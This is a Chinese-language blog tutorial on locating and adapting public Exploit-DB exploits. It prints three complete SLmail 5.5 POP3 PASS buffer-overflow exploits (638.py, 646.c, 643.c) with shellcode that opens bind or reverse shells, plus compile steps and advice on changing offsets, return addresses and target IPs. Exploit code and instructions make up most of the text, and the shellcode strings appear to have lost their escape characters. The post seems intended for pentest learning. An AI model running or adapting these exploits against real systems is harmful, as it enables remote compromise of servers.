exp的全称是exploit,也就是漏洞。现在的互联网上其实有很多公开的exp,可以进行参考使用。在找这些公开的exp时,最好选择可信赖的exp源,比较推荐的是这几个exp源:Exploit-db、SecurityFocus、Searhsploit。至于选择可信赖的exp源的理由,懂的都懂。修改exp的方式很多,可以用python、java、C、C++...前面介绍过SLmail v5.5版本的一个缓冲区溢出漏洞,我们查exploit-db其实也能找到攻击脚本:searchsploit slmail脚本的位置都存放在/usr/share/exploitdb/exploits/目录下面:remote文件夹里的所有漏洞脚本SLmail v5.5:638.py先看一下638.py的内容:
#########################################################
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# www.offsec.com #
# Plain vanilla stack overflow in the PASS command #
# #
#########################################################
# D:ProjectsBO>SLmail-5.5-POP3-PASS.py #
#########################################################
# D:ProjectsBO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:Program FilesSLmailSystem> #
#########################################################
import struct
import socket
print "nn###############################################"
print "nSLmail 5.5 POP3 PASS Buffer Overflow"
print "nFound & coded by muts [at] offsec.com"
print "nFor Educational Purposes Only!"
print "nn###############################################"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"
#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = 'x41' * 4654 + struct.pack('<L', 0x783d6ddf) + 'x90'*32 + sc
try:
print "nSending evil buffer..."
s.connect(('192.168.1.167',110))
data = s.recv(1024)
s.send('USER username' +'rn')
data = s.recv(1024)
s.send('PASS ' + buffer + 'rn')
data = s.recv(1024)
s.close()
print "nDone! Try connecting to port 4444 on victim machine."
except:
print "Could not connect to POP3!"
# milw0rm.com [2004-11-18]需要注意的是这是很老的漏洞,所以这些攻击脚本也是比较早之前写的,所以使用的是python2,而不是现在主流的python3,如果你想直接使用这个demo,需要将python2的一些语法改成python3的语法。最上面是一些注解,写了脚本的作用、作者、编写时间,还有一些类似免责申明之类的。可以看到这个脚本和我们前面文章编写的脚本有些不同,这个脚本引入了一个struct模块,用于计算内存偏移量。还有缓冲区溢出的长度也和我们前面实战时的不一致,不清楚是以前的缓冲区溢出的逻辑和现在不一致,还是故意写错,避免有人直接使用这个demo脚本。目标机器的ip要修改成自己准备的目标ip。最后这个demo里使用的shellcode和我们使用的也不一样,这个shellcode的目的是将目标机器的4444端口打开,我们从外面可以直接去连接目标机器。看这个脚本的编写时间2004-11-18,我怀疑那个时候大家的安全意识还比较差,对于正向连接的防护还没有现在这么全面。当前的互联网状态,在入侵的时候想要正向连接几乎不可能,所以我们只能参考这个demo的思路。SLmail v5.5:646.c646.c是C语言写的代码,先来看一下源码:
#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
// [*] bind 4444
unsigned char shellcode[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0";
void exploit(int sock) {
FILE *test;
int *ptr;
char userbuf[] = "USER madivanrn";
char evil[3001];
char buf[3012];
char receive[1024];
char nopsled[] = "x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90";
memset(buf, 0x00, 3012);
memset(evil, 0x00, 3001);
memset(evil, 0x43, 3000);
ptr = &evil;
ptr = ptr + 652; // 2608
memcpy(ptr, &nopsled, 16);
ptr = ptr + 4;
memcpy(ptr, &shellcode, 317);
*(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP
// banner
recv(sock, receive, 200, 0);
printf("[+] %s", receive);
// user
printf("[+] Sending Username...n");
send(sock, userbuf, strlen(userbuf), 0);
recv(sock, receive, 200, 0);
printf("[+] %s", receive);
// passwd
printf("[+] Sending Evil buffer...n");
sprintf(buf, "PASS %srn", evil);
//test = fopen("test.txt", "w");
//fprintf(test, "%s", buf);
//fclose(test);
send(sock, buf, strlen(buf), 0);
printf("[*] Done! Connect to the host on port 4444...nn");
}
int connect_target(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
WSADATA wsa;
struct sockaddr_in sa;
WSAStartup(MAKEWORd(2,0), &wsa);
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
printf("gethostbyname() error!n"); exit(0);
}
printf("[+] Connecting to %sn", host);
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
printf("[-] socket blah?n");
exit(0);
}
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
{printf("[-] connect() blah!n");
exit(0);
}
printf("[+] Connected to %sn", host);
return sock;
}
int main(int argc, char **argv)
{
int sock = 0;
int data, port;
printf("n[$] SLMail Server POP3 PASSWD Buffer Overflow exploitn");
printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.runn");
if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> nn"); exit(0); }
port = 110;
sock = connect_target(argv[1], port);
exploit(sock);
closesocket(sock);
return 0;
}这个.c的文件是不能直接执行,需要编译成二进制的执行程序才能执行,但是看最上面的几个include可以知道,它引用了几个模块,其中winsock2.h和windows.h是windows下c编译环境会用到的模块。如果你是在Linux环境编译,且没安装过winsock2.h和windows.h,就会和我一样,编译失败,提示缺什么模块:gcc 646.c -o 646Kali默认是没有集成这些模块的,需要自己手动安装,安装过程会比较麻烦,第一个需要安装mingw-w64,因为我是64位的系统,所以安装的是这个,如果你是32位的系统,就需要安装mingw32。mingw-w64这个的作用是让你可以在Linux环境下编译Windows环境下的程序。apt install mingw-w64如果安装失败的话,可以试试切换/etc/apt/sources.list里面的仓库地址,换成阿里云或者中科大的,反正多换几个,总能遇到一个正常稳定的。安装完mingw-w64只是具备了编译条件,但是想要执行还需要安装win64:apt install wine64安装完成后,先进行编译:i686-w64-mingw32-gcc 646.c -lws2_32 -o sl.exe不再使用预装的那个gcc编译,随便编译过程会有报错,但是sl.exe文件已经生成了。这个sl.exe文件是个标准的Windows环境可执行程序,可以移动到Windows环境下双击进行执行,也可以在Linux环境下通过前面安装的工具进行执行,不过我的kali的环境还是有点问题,直接到Windows环境执行了:sl.exe 192.168.0.11通过看646.c的源码可以知道,执行时需要传入一个目标机器的ip。由于我没有启动目标机器,所以执行结果显示连接失败。如果你准备使用这个646.c的demo,记得去改一下跳转的内存地址,还有shellcode,这个demo里的shellcode应该也是正向连接的,和前面的638.py一样。SLmail v5.5:643.c先来看一下源码:#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define retadd "x9fx45x3ax77"
#define port 110
char shellcode[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68"
"x7fx00x00x01x66x68x10xe1x66x53x89xe1x95x68xecxf9"
"xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68"
"x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3"
"xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab"
"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"
"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6"
"x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6"
"xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0";
struct sockaddr_in plm,lar,target;
int conn(char *ip)
{
int sockfd;
plm.sin_family = AF_INET;
plm.sin_port = htons(port);
plm.sin_addr.s_addr = inet_addr(ip);
bzero(&(plm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
{
perror("[-] connect error!");
exit(0);
}
printf("[*] Connected to: %s.n",ip);
return sockfd;
}
int main(int argc, char *argv[])
{
int xs;
char out[1024];
char *buffer = malloc(2960);
memset(buffer, 0x00, 2960);
char *off = malloc(2606);
memset(off, 0x00, 2606);
memset(off, 0x41, 2605);
char *nop = malloc(13);
memset(nop, 0x00, 13);
memset(nop, 0x90, 12);
strcat(buffer, off);
strcat(buffer, retadd);
strcat(buffer, nop);
strcat(buffer, shellcode);
printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.n");
xs = conn("192.168.224.144");
read(xs, out, 1024);
printf("[*] %s", out);
write(xs,"USER usernamern", 15);
read(xs, out, 1024);
printf("[*] %s", out);
write(xs,"PASS ",5);
write(xs,buffer,strlen(buffer));
printf("Shellcode len: %d bytesn",strlen(shellcode));
printf("Buffer len: %d bytesn",strlen(buffer));
write(xs,"rn",4);
close(xs);
} 从顶部的include众多模块看,这个脚本是没有引用任何Windows相关的模块的。编译这个643.c文件后就能生成一个Linux环境下执行的程序。从643.c代码中的注解说明可以知道这个代码中使用的shellcode也是反向连接的,646.c中自带的shellcode是正向连接的。虽然643.c是反向连接,但是攻击机的ip地址已经被写入了shellcode,所以代码里的shellcode也是不能直接使用的。代码中的内存偏移量、目标机器ip都是需要根据自己的测试结果进行调整的。根据实际情况修改了代码后,就可以直接编译了:gcc 643.c -o 643编译过程会有很多warning,可以不管,如果你真的有强迫症,就查一下缺了什么模块,加到代码文件头部,通过include进行添加就可以解决这些warning。编译出来的文件,检查是否有可执行权限,如果没有就通过chmod加权限,执行方式和执行shell脚本一样。总结看了上面几个exploit-db提供的几个例子,应该能体会到,这些demo其实都不能直接使用的。会导致这样现象的原因其实也很简单,因为不同的系统补丁,软件版本,都会造成内存偏移量的不同,通过修改公开的EXP满足不同的环境需要。所以要配合扫描技术,发现目标系统的版本,搭建适当的测试环境,才能针对目标系统进行漏洞利用,达到最终想要的效果。
本文经授权 由答答网发布,转载联系作者并注明出处:http://www.dadazzz.com:6443/sh/show-83855.html
如对文章、图片、字体等版权有疑问,请联系我们。
